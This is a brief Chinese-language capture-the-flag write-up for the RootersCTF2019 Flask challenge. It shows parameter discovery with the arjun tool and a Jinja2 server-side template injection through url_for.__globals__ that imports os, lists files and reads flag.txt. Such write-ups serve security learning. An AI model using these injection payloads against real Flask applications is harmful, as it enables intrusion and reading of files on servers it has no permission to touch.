[RootersCTF2019]I_<3_Flask.md


突出一个爆破.jpg

除了题目提示flask之外就没有其他信息了

尝试dirsearch目录爆破无果,发现一个爆破query的工具arjun

arjun -u http://xxx.node4.buuoj.cn:81/ -c 100 -d 0.1

/?name=1

/?name={{7*7}}

利用url_for函数注入

/?name={{url_for.__globals__['__builtins__']['__import__']('os').listdir('.')}}
['flag.txt', 'application.py', 'requirements.txt', 'static', 'templates']
/?name={{url_for.__globals__['__builtins__']['open']('flag.txt').read()}}

#Web #python #flask #SSTI #urlfor #arjun #参数爆破